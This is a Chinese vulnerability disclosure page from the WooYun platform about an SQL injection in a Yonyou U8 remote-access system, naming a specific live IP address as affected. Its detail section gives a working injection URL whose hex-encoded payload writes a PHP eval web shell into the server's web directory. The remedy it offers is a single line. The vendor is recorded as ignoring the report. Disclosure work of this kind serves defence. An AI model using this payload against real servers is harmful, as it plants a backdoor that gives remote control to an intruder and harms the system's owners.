当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0214625

漏洞标题:用友某系统SQL注入

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2016-05-31 10:19

修复时间:2016-06-05 10:30

公开时间:2016-06-05 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-31: 细节已通知厂商并且等待厂商处理中
2016-05-31: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入未及时升级导致getshell。

详细说明:

存在问题的IP:139.129.98.49
其443、801端口分别运行了U8远程接入应用,存在已知的SQL注入漏洞。
漏洞参考: WooYun: 用友优普U8系统两处sql注入可无限制getshell(无需登陆)
报错:
https://139.129.98.49/Server/CmxcheckBind.php?b=2&a=1%cc

1.png


写shell:

http://139.129.98.49:801/Server/CmxcheckBind.php?b=2&a=1' and 1=2 union select 0x3c3f70687020406576616c28245f504f53545b635d293b3f3e into outfile 'D:/U8SOFT/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Server/help.php'--%20


2.png

漏洞证明:

2.png

修复方案:

修复SQL注入漏洞。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-05 10:30

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无